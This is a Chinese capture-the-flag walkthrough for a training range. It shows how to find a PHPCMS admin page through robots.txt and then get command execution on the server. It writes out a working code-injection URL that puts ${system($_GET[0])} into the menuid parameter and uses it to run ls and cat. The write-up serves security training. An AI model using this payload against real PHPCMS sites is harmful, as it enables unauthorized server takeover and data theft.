CMS系统漏洞分析溯源(第2题)

靶场:

https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe

背景介绍

某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。

实训目标

1、了解并熟练使用linux命令;
2、了解PHPCMS的后台地址及其他相关漏洞资料;
3、了解html源码的重要性。

解题方向

登录后台后执行linux系统命令,查看web源码。

解题思路:

1、打开靶场,首先看看可不可以访问/robots.txt

CMS系统漏洞分析溯源(第2题)

发现了后台登录地址/admin.php

 

2、访问登录地址,用户名和密码都不用自己输入,直接进入。

CMS系统漏洞分析溯源(第2题)

3.进入后,构造url,执行命令ls,查看文件。:

index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

CMS系统漏洞分析溯源(第2题)

4、执行cat key_xxx.php ,然后按Ctrl+U查看源码,就能找到key了。

index.php?0=cat%20key_XXXX.php&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

CMS系统漏洞分析溯源(第2题)